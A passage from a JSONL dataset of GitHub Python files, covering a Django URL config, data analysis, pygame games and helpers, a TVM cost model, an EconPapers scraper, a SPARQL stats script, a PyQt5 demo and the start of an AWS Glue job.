similarity\n","repo_name":"ScrappyCocco/HowLongToBeat-PythonAPI","sub_path":"howlongtobeatpy/howlongtobeatpy/JSONResultParser.py","file_name":"JSONResultParser.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"68"} +{"seq_id":"29080012749","text":"\"\"\"Module providingFunction printing python version.\"\"\"\nfrom django.urls import path, include\nfrom files.views import *\n\nfrom files import views\n\nurlpatterns = [\n path(\"track/\", views.TrackFileView, name=\"track\"),\n path(\"update-file/\", views.OwnFileHistory, name=\"history\"),\n path(\"history/\", views.GetFileHistory, name=\"history\"),\n path('',views.home,name=\"home\"), \n path('about/',views.about,name=\"about\"),\n 
path('contact',views.contact,name=\"contact\"), \n    path('signup',views.handleSignup,name=\"handleSignup\"),\n    path('login',views.handlelogin,name=\"handlelogin\"),\n    path('logout',views.handlelogout,name=\"handlelogout\"),\n    path(\"create-file/\", views.CreateFileView, name=\"createfile\"),\n    path(\"files/\", views.GetAllFiles, name=\"allfiles\"),\n    path(\"files/\", views.GetFile, name=\"getfile\"),\n]","repo_name":"rajatgarg765/FileTrackerDjango","sub_path":"files/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10420413545","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass severityModel:\n\tdef __init__(self):\n\t\t'''\n\t\t\tInitializes the object\n\t\t'''\n\t\tself.loadData()\n\t\t\n\tdef loadData(self):\n\t\t'''\n\t\t\tLoads the data into memory\n\t\t'''\n\t\tself.train = pd.read_csv(\"C:\\\\Users\\\\Punkiehome1\\\\Downloads\\\\allstateKaggle\\\\train.csv\")\n\t\tself.test = pd.read_csv(\"C:\\\\Users\\\\Punkiehome1\\\\Downloads\\\\allstateKaggle\\\\test.csv\")\n\t\tprint(self.train.head())\n\t\tprint(self.train.shape)\n\t\tprint(self.test.head())\n\t\tprint(self.test.shape)\n\t\t\n\tdef getUnique(self):\n\t\t'''\n\t\t\tGets a list of distinct values\n\t\t'''\n\t\tself.categoryUnique = [None] * 115\n\t\ti = 0\n\t\t'''\n\t\t\tIterating over each categorical variable to \n\t\t\tsee how many unique values are in each\n\t\t\tStores the result in self.categoryUnique\n\t\t'''\n\t\tfor cols in self.train.iloc[:,2:117]:\n\t\t\tself.categoryUnique[i] = len(np.unique(self.train.loc[:,cols]))\n\t\t\ti += 1\n\t\t\t\n\tdef getDescription(self):\n\t\t'''\n\t\t\tGets the description of all the continuous variables\n\t\t'''\n\t\tprint(self.train.loc[:,'cont1':].describe())\n\t\tprint(self.test.loc[:,'cont1':].describe())\n\t\t\n\tdef plotCont(self):\n\t\t'''\n\t\t\tGives a visual of the continuous variables\n\t\t'''\n\t\tN = len(self.train)\n\t\tcolors = np.random.rand(N)\n\t\tplt.scatter(np.array(self.train.loc[:,'cont1']).reshape(N, 1), np.array(self.train.loc[:,'cont2']).reshape(N, 1), s=self.train.loc[:,'loss'], c=colors, alpha=0.5)\n\t\tplt.show()\n\t\t\n\tdef getRatios(self):\n\t\t'''\n\t\t\tdoes some automatic feature creation for ratios of the continuous variables\n\t\t'''\n\t\t'''\n\t\t\tSubsets the entire train dataset into only continuous features and then further subsets\n\t\t\tbased on whether a continuous feature has a minimum greater than zero\n\t\t\tThe reason for this is because I will be creating ratios, and we cannot divide by zero\n\t\t'''\n\t\tself.train.loc[:,'cont1':'cont14'].loc[:,self.train.loc[:,'cont1':'cont14'].min() >0].head() \n\t\t\n\t\t'''\n\t\t\tVariables that have a minimum of 0 in the test dataset\n\t\t'''\n\t\tzeroMinVariables = ['cont9', 'cont10']\n\t\t\n\t\t'''\n\t\t\tThe new columns to be added to the dataframe\n\t\t'''\n\t\tnewCols = pd.DataFrame(columns = ['ratio1','ratio2','ratio3','ratio5','ratio6', 'ratio7', 'ratio8', 'ratio11', 'ratio12', 'ratio13', 'ratio14'])\n\t\t\n\t\toriginalStart = self.train.shape[1]\n\t\t\n\t\t'''\n\t\t\tadding the new columns which will show up as Nans to the train dataframe\n\t\t'''\n\t\tself.train = pd.concat([self.train, newCols], axis = 1)\n\t\t\n\t\t'''\n\t\t\tList of column names that will be iterated over to create new ratios\n\t\t'''\n\t\tcolNames = ['ratio1','ratio2','ratio3','ratio5','ratio6', 'ratio7', 'ratio8', 'ratio11', 'ratio12', 'ratio13', 'ratio14']\n\t\tcontNames 
= ['cont1','cont2','cont3','cont5','cont6', 'cont7', 'cont8', 'cont11', 'cont12', 'cont13', 'cont14'] \n\t\t\n\t\tstart = 1\n\t\tcolCounter = start\n\t\t\n\t\twhile colCounter <= len(colNames) - 1:\n\t\t\t# assumption: each ratio feature is the continuous variable divided by cont1\n\t\t\tself.train.loc[:,colNames[colCounter]] = self.train.loc[:,contNames[colCounter]] / self.train.loc[:,contNames[0]]\n\t\t\t\n\t\t\tcolCounter = colCounter + 1\n\t\t#for contin in pd.concat([self.train.loc[:,'cont1':'cont8'], self.train.loc[:,'cont11':'cont14']], axis = 1):\n\t\t\t\n\t\n\t\n\t\t\nif __name__ == '__main__':\n\tinsuranceObj = severityModel()\n\tinsuranceObj.getUnique()\n\tprint(insuranceObj.categoryUnique)\n\tinsuranceObj.getDescription()\n\tinsuranceObj.getRatios()","repo_name":"rrigato/ML8","sub_path":"EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18648007135","text":"import pygame\nimport os #listdir, path.join, path.split\nfrom sky.tools import get_colour\n\n\nclass Graphics:\n    def __init__(self, surface):\n        self.surface = surface\n        self.font = \"arial\"\n        \n        self.images = {}\n        self.resized_images = {}\n        self.fonts = {\"arial\":{\"30\":pygame.font.SysFont(\"arial\", 30)}}\n        self.font_paths = {}\n        \n    def load_folder(self, dir, resize={}):\n        for file in os.listdir(dir):\n            if file.endswith(\".ttf\") or file.endswith(\".otf\"):\n                self.load_font(os.path.join(dir, file))\n            elif file.endswith(\".png\") or file.endswith(\".jpg\"):\n                if file[:-4] in resize:\n                    self.load_image(os.path.join(dir, file), resize[file[:-4]])\n                elif not type(resize) is dict:\n                    self.load_image(os.path.join(dir, file), resize)\n                else:\n                    self.load_image(os.path.join(dir, file))\n    \n    def load_font(self, path):\n        head, tail = os.path.split(path)\n        name = tail[:-4]\n        self.font_paths[name] = path\n        self.fonts[name] = {}\n        self.fonts[name][\"30\"] = pygame.font.Font(path, 30)\n    \n    def load_image(self, path, dimensions=None):\n        head, tail = os.path.split(path)\n        img = pygame.image.load(path).convert_alpha()\n        if dimensions != None:\n            img = pygame.transform.scale(img, (int(dimensions[0]), int(dimensions[1])))\n        self.images[tail[:-4]] = img\n    \n    def load_sysfont(self, font):\n        self.fonts[font] = {}\n        self.fonts[font][\"30\"] = pygame.font.SysFont(font, 30)\n    \n    def draw(self, picture, pos, angle=None, size=None, transparency=None, center=None, return_info=False):\n        image = self.images[picture].copy()\n        x, y = pos\n        if size != None:\n            if picture in self.resized_images:\n                if str(size) in self.resized_images[picture]:\n                    image = self.resized_images[picture][str(size)]\n                else:\n                    self.resized_images[picture][str(size)] = image = pygame.transform.scale(image, size)\n            else:\n                image = pygame.transform.scale(image, size)\n                self.resized_images[picture] = {str(size):image}\n        if angle != None:\n            image = pygame.transform.rotate(image, angle)\n            rect = image.get_rect(center=(x, y))\n            x, y = rect.topleft\n        if center != None:\n            if center[3] != 0:\n                y = center[1] + center[3]/2 - image.get_height()/2\n            if center[2] != 0:\n                x = center[0] + center[2]/2 - image.get_width()/2\n        if transparency != None:\n            image.set_alpha(transparency)\n        self.surface.blit(image, (x, y))\n        if return_info:\n            return (x, y, image.get_width(), image.get_height())\n\n    def write(self, text, pos, size=30, colour=\"white\", transparency=None, font=None, center=None, return_info=False):\n        if font == None:\n            font = self.font\n        colour = get_colour(colour)\n        if not str(size) in self.fonts[font]:\n            if font in pygame.font.get_fonts():\n                self.fonts[font][str(size)] = 
pygame.font.SysFont(font, size)\n else:\n self.fonts[font][str(size)] = pygame.font.Font(self.font_paths[font], size)\n text = self.fonts[font][str(size)].render(str(text), True, colour)\n x, y = pos\n if center != None:\n if center[3] != 0:\n y = center[1] + center[3]/2 - text.get_height()/2\n if center[2] != 0:\n x = center[0] + center[2]/2 - text.get_width()/2\n if transparency != None:\n text.set_alpha(transparency)\n self.surface.blit(text, (x, y))\n if return_info:\n return (x, y, text.get_width(), text.get_height())\n \n def cut_spritesheet(self, image, rows, columns, amount):\n list = []\n number = 0\n sheet = self.images[image]\n w = sheet.get_width()/columns\n h = sheet.get_height()/rows\n for i in range(rows):\n for j in range(columns):\n number += 1\n list.append(sheet.subsurface(j * w, i * h, w, h))\n if number == amount:\n return list","repo_name":"ree1261/Cool-Movies","sub_path":"sky/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18974172329","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.1'\n\nsetup(name='plone.app.event-ploneintegration',\n version=version,\n description=\"Integration of plone.app.event into pre Plone 4.3 release.\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.rst\")).read(),\n # Get more strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n ],\n keywords='plone event',\n author='Plone Foundation',\n author_email='plone-developers@lists.sourceforge.net',\n url='https://github.com/collective/plone.app.event-ploneintegration',\n license='GPL',\n packages=find_packages(),\n namespace_packages=['plone','plone.app'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'plone.app.event[archetypes]',\n 'z3c.unconfigure',\n ],\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\")\n","repo_name":"collective/plone.app.event-ploneintegration","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5264643823","text":"import numpy as np\nimport torch\nimport multiprocessing\nimport torch.nn.functional as F\nfrom .model_based_tuner import CostModel, FeatureCache\nfrom .model import Encoder, LSTM, MLP\nfrom .. 
import feature\n\n\nclass OneShotCostModel(CostModel):\n    def __init__(self, task, num_threads=None, opt=None):\n        super(OneShotCostModel, self).__init__()\n        self.model_type = opt.model_type\n        self.model_path = opt.model_path\n        self.task = task\n        self.target = task.target\n        self.space = task.config_space\n        self.fea_type = opt.feature\n        self.opt = opt\n        device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n        self.device = device\n\n        if self.model_type.lower() == \"transformer\":\n            self.model = Encoder(\n                embed_size=748,\n                num_heads=4,\n                num_layers=opt.layer,\n                hidden_size=1024,\n                dropout=0.25,\n            ).to(device)\n            self.model.load_state_dict(torch.load(self.model_path, map_location=device))\n        elif self.model_type.lower() == \"lstm\":\n            self.model = LSTM(748, 1024, 1, 3).to(device)\n            self.model.load_state_dict(torch.load(self.model_path, map_location=device))\n        elif self.model_type.lower() == \"mlp\":\n            self.model = MLP(748, 1024, 1).to(device)\n            self.model.load_state_dict(torch.load(self.model_path, map_location=device))\n        else:\n            raise ValueError(\"invalid model type: only transformer, lstm and mlp are supported!\")\n        self.feature_extract_func = _extract_curve_feature_index\n        self.num_threads = num_threads\n        self.pool = None\n        self.feature_cache = FeatureCache()\n        self.feature_extra_ct = 0\n        self._sample_size = 0\n        self._reset_pool(self.space, self.target, self.task)\n\n    def _reset_pool(self, space, target, task):\n        \"\"\"reset processing pool for feature extraction\"\"\"\n        self._close_pool()\n        # use global variable to pass common arguments\n        global _extract_space, _extract_target, _extract_task\n\n        _extract_space = space\n        _extract_target = target\n        _extract_task = task\n\n        self.pool = multiprocessing.Pool(self.num_threads)\n\n    def _close_pool(self):\n        if self.pool:\n            self.pool.terminate()\n            self.pool.join()\n            self.pool = None\n\n    def _get_pool(self):\n        return self.pool\n\n    def fit(self, xs, ys, plan_size):\n        # one-shot tuner only need predict!\n        pass\n\n    def fit_log(self, records, plan_size):\n        # one-shot tuner only need predict!\n        pass\n\n    def predict(self, xs, output_margin=False):\n        offset = 100\n        pool = self._get_pool()\n        features = pool.map(self.feature_extract_func, xs)\n        result = np.zeros(len(features))\n        mask = []\n        filtered = []\n        for g in features:\n            if type(g) == bool:\n                mask.append(False)\n            else:\n                filtered.append(g)\n                mask.append(True)\n        if len(filtered) == 0:\n            return np.zeros(len(xs))\n        filtered = torch.tensor(np.vstack(filtered)).float().to(self.device).unsqueeze(0)\n        with torch.no_grad():\n            predict = self.model(filtered).cpu().numpy()\n        mask = np.array(mask)\n        mask_idx = np.where(mask == True)\n        for idx, value in zip(mask_idx[0], predict.squeeze()):\n            result[idx] = value + offset\n        return result\n\n    def spawn_base_model(self):\n        # rebuild with the same constructor arguments as __init__\n        return OneShotCostModel(self.task, self.num_threads, self.opt)\n\n    def _get_feature(self, indexes):\n        \"\"\"get features for indexes, run extraction if we do not have cache for them\"\"\"\n        # free feature cache\n        if self.feature_cache.size(self.fea_type) >= 100000:\n            self.feature_cache.clear(self.fea_type)\n\n        fea_cache = self.feature_cache.get(self.fea_type)\n\n        indexes = np.array(indexes)\n        need_extract = [x for x in indexes if x not in fea_cache]\n\n        if need_extract:\n            pool = self._get_pool()\n            # If we are forking, we can pass arguments in globals for better performance\n            if multiprocessing.get_start_method(False) == \"fork\":\n                feas = pool.map(self.feature_extract_func, need_extract)\n            else:\n                args = [(self.space.get(x), self.target, self.task) for x in need_extract]\n                
feas = pool.map(self.feature_extract_func, args)\n            for i, fea in zip(need_extract, feas):\n                fea_cache[i] = fea\n        ret = []\n        for i, ii in enumerate(indexes):\n            ret.append(fea_cache[ii])\n\n        return ret\n\n    def __del__(self):\n        self._close_pool()\n\n\n_extract_space = None\n_extract_target = None\n_extract_task = None\n\n\ndef _extract_curve_feature_index(index, keep_name=False, task_name=None):\n    \"\"\"extract sampled curve feature for an index in extract_space\"\"\"\n    try:\n        config = _extract_space.get(index)\n        with _extract_target:\n            sch, args = _extract_task.instantiate(config)\n        result = feature.get_buffer_curve_sample_flatten(sch, args, sample_n=30, gpu_filter=True)\n        if result is None:\n            return False\n        else:\n            curve = result\n            curve_zeros = np.zeros(720)\n            curve_zeros[-len(curve) :] = curve\n            knobs = config.get_flatten_feature()[:20]\n            knob_zeros = np.zeros(20)\n            knob_zeros[-len(knobs) :] = knobs\n            parameter = np.hstack(\n                [\n                    list(map(lambda x: x.value, args[1].shape)),\n                    list(map(lambda x: x.value, args[2].shape)),\n                ]\n            )\n            parameter_zeros = np.zeros(8)\n            parameter_zeros[-len(parameter) :] = parameter\n            return np.hstack([curve_zeros, knob_zeros, parameter_zeros])\n    except Exception as e:\n        import traceback\n        import sys\n\n        traceback.print_exc()\n        print(\"Error on line {}\".format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)\n        return None\n","repo_name":"ryujaehun/one-shot-tuner","sub_path":"python/tvm/autotvm/tuner/oneshot_cost_model.py","file_name":"oneshot_cost_model.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"32509655205","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 2 19:58:49 2021\r\n\r\n@author: xyyx\r\n\"\"\"\r\nimport os\r\nimport requests as req\r\nimport re\r\nimport time\r\n\r\npath = r\"D:\\tempro\\TeacherXu\"\r\nos.chdir(path)\r\n\r\nSearchKey = \"CSR\"\r\nurl = \"https://econpapers.repec.org/scripts/search.pf?ft={};pg=1\".format(SearchKey)\r\nheaders = {\r\n    \"User-Agent\": \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36\"\r\n    }\r\n\r\nurl1 = \"https://econpapers.repec.org/scripts/search.pf?ft=哈哈\"\r\nres = req.get(url,headers = headers,timeout = 5)\r\nres.content.decode()\r\nprint(res.content)\r\ndef get_urls(SearchKey):\r\n    # Check whether the search result is empty\r\n    url = \"https://econpapers.repec.org/scripts/search.pf?ft={}\".format(SearchKey)\r\n    headers = {\r\n    \"User-Agent\": \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36\"\r\n    }\r\n    LinkFlag = True\r\n    while LinkFlag:\r\n        try:\r\n            res = req.get(url,headers = headers,timeout = 3)\r\n            if res.status_code == 200:\r\n                LinkFlag=False\r\n        except:\r\n            print(\"Connection failed, reconnecting.\")\r\n            time.sleep(10)\r\n    \r\n    if \"No matching documents when searching for\" in res.content.decode():\r\n        print(\"Search result is empty, please change the SearchKey.\")\r\n        # return 0\r\n    else:\r\n        text = res.content.decode() # must decode() before using re\r\n        pattern1 = re.compile(r'(?<=page\\s1\\sof\\s)(\\d*)')\r\n        TotalPage = re.search(pattern1,text).group() # the total page count cannot be located with xpath, so use a regex\r\n        url = \"https://econpapers.repec.org/scripts/search.pf?ft={};pg=1\".format(SearchKey)\r\n        \r\n        \r\n        \r\n\r\n    \r\n","repo_name":"xyyx0212/SearchPDF","sub_path":"EcoPaper.py","file_name":"EcoPaper.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"36585077775","text":"from SPARQLWrapper import SPARQLWrapper, JSON\nfrom urllib2 import URLError\nimport os, sys, json, time\n\nclasses = [\"triples\",\"labels\"]\nbases = [\"aaa\",\"acm\",\"autry\",\"cbm\",\"ccma\",\"dma\",\"GM\",\"ima\",\"nmwa\",\"npg\",\"puam\",\"saam\",\"wam\",\"YCBA\"]\n\nconstituents = [\"E21_Person\",\"E39_Actor\",\"E40_Legal_Body\",\"E74_Group\"]\nobjects = [\"E22_Man-Made_Object\",\"E84_Information_Carrier\"]\nevents = [\"E5_Event\",\"E6_Destruction\",\"E7_Activity\",\"E8_Acquisition\",\"E9_Move\",\"E10_Transfer_of_Custody\",\n \"E11_Modification\",\"E12_Production\",\"E13_Attribute_Assignment\",\"E14_Condition_Assessment\",\n \"E15_Identifier_Assignment\",\"E16_Measurement\",\"E17_Type_Assignment\",\"E79_Part_Addition\",\n \"E80_Part_Removal\",\"E63_Beginning_of_Existence\",\"E64_End_of_Existence\",\"E65_Creation\",\n \"E66_Formation\",\"E67_Birth\",\"E68_Dissolution\",\"E69_Death\",\"E81_Transformation\",\"E83_Type_Creation\",\n \"E85_Joining\",\"E86_Leaving\",\"E87_Curation_Activity\"]\nplaces = [\"E53_Place\"]\n\n# All classes\nall_classes = []\nall_classes = classes + all_classes + constituents + objects + events + places\n\nout = {\"total\":{}}\nf_in = open(\"overallStats.sparql\", 'r')\nbase_query = f_in.read()\nf_in.close()\n\nfor b in bases:\n print (\"Base is \"+b)\n graph_query = base_query.replace(\"\",b)\n sparql = SPARQLWrapper(\"http://data.americanartcollaborative.org/sparql\")\n out_c = {\"constituents\":0,\"objects\":0,\"events\":0,\"places\":0}\n \n for c in all_classes:\n if c == \"triples\":\n query = graph_query.replace(\"?s a crm:\",\"?s ?o ?p\")\n elif c == \"labels\":\n query = graph_query.replace(\"?s a crm:;\",\"?s a crm:E39_Actor;\\n skos:exactMatch ?lod.\")\n else:\n query = graph_query.replace(\"\",c)\n\n #print (query)\n\n sparql.setQuery(query)\n sparql.setReturnFormat(JSON)\n sparql.setTimeout(360)\n while True:\n try:\n results = sparql.query().convert()\n break\n except URLError:\n print(\"Connection to Sparql server failed! 
Trying again in five seconds!\")\n time.sleep(5)\n\n if c in constituents:\n out_c[\"constituents\"] += int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n elif c in objects:\n out_c[\"objects\"] += int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n elif c in events:\n out_c[\"events\"] += int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n elif c in places:\n out_c[\"places\"] += int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n else:\n out_c[c] = int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n\n out[b] = out_c\n print (json.dumps(out_c, indent=4, sort_keys=True))\n \n for key in out_c:\n if key in out[\"total\"]:\n out[\"total\"][key] += out_c[key]\n else:\n out[\"total\"][key] = out_c[key]\n\nprint (\"\\nTotal \\n\")\nprint (json.dumps(out[\"total\"], indent=4, sort_keys=True))","repo_name":"american-art/linking","sub_path":"linkage/overallStats.py","file_name":"overallStats.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6193005918","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n################################################################################\r\n#\r\n# 24.5 多文档界面QMdiArea\r\n#\r\n################################################################################\r\nfrom cgitb import text\r\nimport sys\r\nfrom PyQt5.QtGui import QIcon\r\nfrom PyQt5.QtWidgets import (\r\n QApplication, QWidget, QMainWindow, QMdiArea, QAction, QMdiSubWindow,\r\n QTextEdit\r\n)\r\n\r\n################################################################################\r\nclass Demo(QMainWindow):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n\r\n self.mdi_area = QMdiArea(self)\r\n self.setCentralWidget(self.mdi_area)\r\n\r\n self.toolbar = self.addToolBar('Tool Bar')\r\n\r\n self.new_action = QAction('New', self)\r\n self.close_action = QAction('Close', self)\r\n self.close_all_action = QAction('Close All', self)\r\n self.mode1_action = QAction('Cascade', self)\r\n self.mode2_action = QAction('Tile', self)\r\n\r\n self.new_action.triggered.connect(self.new_func)\r\n self.close_action.triggered.connect(self.mdi_area.closeActiveSubWindow)\r\n self.close_all_action.triggered.connect(self.mdi_area.closeAllSubWindows)\r\n self.mode1_action.triggered.connect(self.mdi_area.cascadeSubWindows)\r\n self.mode2_action.triggered.connect(self.mdi_area.tileSubWindows)\r\n\r\n self.toolbar.addAction(self.new_action)\r\n self.toolbar.addAction(self.close_action)\r\n self.toolbar.addAction(self.close_all_action)\r\n self.toolbar.addAction(self.mode1_action)\r\n self.toolbar.addAction(self.mode2_action)\r\n\r\n def new_func(self):\r\n print('new_func')\r\n text = QTextEdit()\r\n sub = QMdiSubWindow()\r\n sub.setWidget(text)\r\n self.mdi_area.addSubWindow(sub)\r\n sub.show()\r\n\r\n################################################################################\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n demo = Demo()\r\n demo.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"iaiting/StudyDemo","sub_path":"PyDemo/快速掌握PyQt5/第2篇/chap24_装入更多控件-3/chap24_005.py","file_name":"chap24_005.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27319278558","text":"import pygame\r\nfrom pygame import mixer\r\nimport time\r\nimport math\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((600, 
400))\r\npygame.display.set_caption(\"Turtle Race\")\r\nicon = pygame.image.load(\"animal.png\")\r\npygame.display.set_icon(icon)\r\n# Player 1\r\nPlayer = pygame.image.load(\"animal.png\")\r\nplayerX = 550\r\nplayerY = 300\r\n# Player 2\r\nPlayer2 = pygame.image.load(\"turtle.png\")\r\nPlayer2X = 550\r\nPlayer2Y = 175\r\n\r\n# Flag\r\nFlag = pygame.image.load(\"Finish.png\")\r\nFlagX = 0\r\nFlagY = 50\r\n# Title\r\nTitle = pygame.image.load(\"Titles.png\")\r\nTitleX = 150\r\nTitleY = 50\r\n# Winning\r\nWin = pygame.image.load(\"Win.png\")\r\nWinX = -100\r\nWinY = -100\r\nWin2 = pygame.image.load(\"Win2.png\")\r\nWin2X = -100\r\nWin2Y = -100\r\n# Hint\r\nHint = pygame.image.load(\"Hintss.png\")\r\nHintX = -500\r\nHintY = -500\r\n# Flower\r\nFlower = pygame.image.load(\"Flower.png\")\r\nFlowerX = 250\r\nFlowerY = 0\r\n# Rock\r\nRock = pygame.image.load(\"Rock.png\")\r\nRockX = -500000\r\nRockY = -5000000\r\nRock_change = 0.1\r\n# Cube\r\nCubey = pygame.image.load(\"C.png\")\r\n# Butterfly\r\nButterfly = pygame.image.load(\"Butterfly.png\")\r\n\r\n\r\n\r\ndef Sounds():\r\n Sound = mixer.Sound(\"Jump.wav\")\r\n Sound.play()\r\n\r\n\r\n#Level\r\nB = 255\r\nG = 0\r\nR = 0\r\na = True\r\nb = 1\r\nc = 2\r\n\r\nmixer.music.load(\"AA.wav\")\r\nmixer.music.play(-1)\r\n\r\ndef player():\r\n screen.blit(Player,(playerX, playerY))\r\n\r\n\r\ndef player2():\r\n screen.blit(Player2, (Player2X, Player2Y))\r\n\r\n\r\ndef flag():\r\n screen.blit(Flag, (FlagX, FlagY))\r\n\r\ndef title():\r\n screen.blit(Title, (TitleX, TitleY))\r\n\r\ndef win():\r\n screen.blit(Win , (WinX, WinY))\r\n\r\ndef win2():\r\n screen.blit(Win2 , (Win2X, Win2Y))\r\n\r\ndef hint():\r\n screen.blit(Hint , (HintX, HintY))\r\n\r\ndef flower(X, Y):\r\n screen.blit(Flower, (X, Y))\r\n\r\ndef Cube(X, Y):\r\n screen.blit(Cubey , (X, Y))\r\n\r\ndef Butterflies(X, Y):\r\n screen.blit(Butterfly , (X, Y))\r\n\r\ndef rock():\r\n screen.blit(Rock , (RockX, RockY))\r\n\r\ndef collision():\r\n distance = math.sqrt(math.pow(playerX-FlowerX,2) + math.pow(playerY-FlowerY,2))\r\n if distance < 27:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef collision2():\r\n distance = math.sqrt(math.pow(Player2X-RockX,2) + math.pow(Player2Y-RockY,2))\r\n if distance < 27:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\nrunning = True\r\n\r\nwhile running:\r\n\r\n\r\n\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT and a == True:\r\n playerX -= 3\r\n Sounds()\r\n TitleY = -1000\r\n print(FlowerY)\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n print(\"Key Pressed Escape\")\r\n pygame.quit()\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_a and a == True:\r\n Player2X -= 3\r\n Sounds()\r\n TitleY = -1000\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_SPACE and a == False:\r\n playerX = 550\r\n playerY = 300\r\n Player2X = 550\r\n Player2Y = 150\r\n WinY = -1000\r\n Win2Y = -1000\r\n HintY = -1000\r\n HintX = -1000\r\n RockX = 200\r\n RockY = 10\r\n RockY += Rock_change\r\n a = True\r\n b = 1\r\n c = 1\r\n B -= 125\r\n G += 125\r\n print(B)\r\n pygame.display.update()\r\n\r\n if B < 0 or G > 255 or R > 255:\r\n G = 255\r\n B = 0\r\n R += 255\r\n\r\n if R > 255:\r\n R = 255\r\n\r\n if playerX <= 10:\r\n a = False\r\n WinX = 150\r\n WinY = 10\r\n HintX = 150\r\n HintY = 100\r\n\r\n\r\n if Player2X <= 10:\r\n a = False\r\n Win2X = 150\r\n Win2Y = 
10\r\n HintX = 150\r\n HintY = 100\r\n\r\n\r\n if b == 1 and a == False:\r\n sound = mixer.Sound(\"Finish.wav\")\r\n sound.play()\r\n b = 2\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n screen.fill((R, G, B))\r\n\r\n if RockY < 800:\r\n RockY = 15\r\n\r\n\r\n\r\n RockY += Rock_change\r\n\r\n\r\n\r\n player()\r\n player2()\r\n flag()\r\n title()\r\n win()\r\n win2()\r\n hint()\r\n flower(FlowerX, FlowerY)\r\n flower(200, 0)\r\n flower(150, 0)\r\n flower(100, 0)\r\n flower(50, 0)\r\n flower(0, 0)\r\n flower(300, 0)\r\n flower(350, 0)\r\n flower(400, 0)\r\n flower(450, 0)\r\n flower(500, 0)\r\n flower(550, 0)\r\n flower(200, 338)\r\n flower(150, 338)\r\n flower(100, 338)\r\n flower(50, 338)\r\n flower(0, 338)\r\n flower(300, 338)\r\n flower(350, 338)\r\n flower(400, 338)\r\n flower(450, 338)\r\n flower(500, 338)\r\n flower(550, 338)\r\n flower(250, 338)\r\n Butterflies(550, 325)\r\n pygame.display.update()\r\n","repo_name":"Nature-Studioz/Turtle-Game","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17997992902","text":"#libraries\nimport boto3\nimport sys\nfrom datetime import date, timedelta, datetime\nfrom dateutil.relativedelta import *\nfrom pyspark.context import SparkContext\nfrom awsglue.context import GlueContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql import functions as f\nfrom awsglue.job import Job\nfrom awsglue.transforms import *\nfrom awsglue.utils import getResolvedOptions\n\nimport pandas as pd\n\nclass argsGet():\n @property\n def loaded_args(self):\n return self._loaded_args\n\n def __init__(self, arg_vars=list) -> None:\n self.args = arg_vars\n self._loaded_args= self.load_args()\n pass\n\n def load_args(self):\n args = getResolvedOptions(sys.argv, self.args)\n return args\n \n\nclass CsvToParquet():\n def __init__(self, args) -> None:\n self.args = args \n #Init Spark Context\n self.sc = 